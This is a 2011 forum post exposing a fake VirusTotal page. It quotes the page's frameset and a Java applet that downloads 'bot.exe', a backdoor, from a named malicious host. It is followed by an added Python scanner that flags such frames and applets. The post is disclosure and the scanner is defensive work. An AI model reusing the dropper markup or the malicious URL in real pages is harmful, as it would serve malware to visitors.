Topic: Fake Virustotal page leads to backdoor

May 22, 2011, 04:54:06 pm
SysAdMini

Code:
new-virustotal.tk
has a frame containing a fake Virustotal page
Code:
<html>
  <head>
    <title>new-virustotal.tk</title>
    <meta name="description" content="new-virustotal.tk">
    <meta name="keywords" content="new-virustotal.tk">
  </head>
  <frameset rows="*" framespacing="0" border="0" frameborder="NO">
    <frame src="http://readman.pf-control.de/java/" name="dot_tk_frame_content" scrolling="auto" noresize>
  </frameset>
  <noframes>
    <body>
    </body>
  </noframes>

</html>



Page contains a Java applet that downloads a backdoor.
Code:
<applet code="Main.class" archive="signedapplet.jar" width="30" height="20" >
<param name="fileName" value="bot.exe">
<param name="url" value="http://readman.pf-control.de/java/">
</applet>

http://www.virustotal.com/file-scan/report.html?id=2f1c6b2c138f1b1407f796aa3926ff1ca88abf5afe6f4abc0cc12e855f6190a3-1306080329
Ruining the bad guy's day
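
Added example (not part of the original post): a small static check a defender could run over fetched HTML to flag the two traits shown above, a frame that loads its content from a different host than the landing page and an `<applet>` whose `<param>` names an executable file. The hostnames in the sample markup are constructed placeholders, and the function names and extension list are assumptions of this sketch.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed extension list for this sketch; extend to suit your environment.
EXECUTABLE_EXT = (".exe", ".scr", ".dll", ".bat")

class DropperPageScanner(HTMLParser):
    """Records cross-host frames and applets whose params name an executable."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_applet = False

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag/attribute names; valueless attributes are None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "frame":
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host and host != self.page_host:
                self.findings.append(("cross-host-frame", host))
        elif tag == "applet":
            self._in_applet = True
            self.findings.append(("applet", a.get("archive") or a.get("code", "")))
        elif tag == "param" and self._in_applet:
            value = a.get("value", "")
            if value.lower().endswith(EXECUTABLE_EXT):
                self.findings.append(("applet-exe-param", f"{a.get('name', '')}={value}"))

    def handle_endtag(self, tag):
        if tag == "applet":
            self._in_applet = False

def scan(html, page_host):
    """Return a list of (finding_type, detail) tuples for one HTML document."""
    scanner = DropperPageScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample markup modelled on the structure in the post (placeholder hosts).
SAMPLE_LANDING = '<frameset rows="*"><frame src="http://content.example/java/" noresize></frameset>'
SAMPLE_CONTENT = ('<applet code="Main.class" archive="signedapplet.jar" width="30" height="20">'
                  '<param name="fileName" value="bot.exe">'
                  '<param name="url" value="http://content.example/java/"></applet>')

if __name__ == "__main__":
    print(scan(SAMPLE_LANDING, "landing.example"))
    print(scan(SAMPLE_CONTENT, "content.example"))
```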